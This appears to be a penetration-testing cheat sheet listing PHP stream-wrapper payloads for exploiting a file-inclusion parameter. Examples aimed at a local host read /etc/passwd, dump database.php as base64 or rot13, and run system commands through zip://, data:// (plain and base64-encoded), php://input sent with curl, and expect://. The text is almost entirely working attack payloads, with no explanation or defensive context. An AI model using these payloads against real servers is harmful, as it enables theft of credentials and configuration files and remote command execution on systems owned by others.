PHP Wrappers

file://

Wrapper

file://                                                                                                                    

Example

http://192.168.1.2/index.php?include=file:///etc/passwd

php://filter

base64

Wrapper

php://filter/convert.base64-encode/resource=

Example

http://192.168.1.2/index.php?include=php://filter/convert.base64-encode/resource=database.php

root13

Wrapper

php://filter/read=string.rot13/resource=

Example

http://192.168.1.2/index.php?include=php://filter/read=string.rot13/resource=database.php

zip://

Wrapper

zip://

Example

http://192.168.1.2/doctor-item.php?include=zip://cmd.zip%23cmd.php&cmd=id

data://

Plaint Text

Wrapper

data://text/plain,<?php system('id'); ?>

Example

http://192.168.1.2/index.php?include=data://text/plain,<?php system('id'); ?>

base64

Wrapper

base64 <<< '<?php system("id"); ?>'
PD9waHAgc3lzdGVtKCJpZCIpOyA/Pgo=

data://text/plain;base64,PD9waHAgc3lzdGVtKCJpZCIpOyA/Pgo=

Example

http://192.168.1.2/index.php?include=data://text/plain;base64,PD9waHAgc3lzdGVtKCJpZCIpOyA/Pgo=

php://input

Wrapper

php://input

Example

curl -sX POST -d '<?php system("id"); ?>' 'http://192.168.1.2/index.php?include=php://input'

expect://

Wrapper

expect://

Example

http://192.168.1.2/index.php?include=expect://id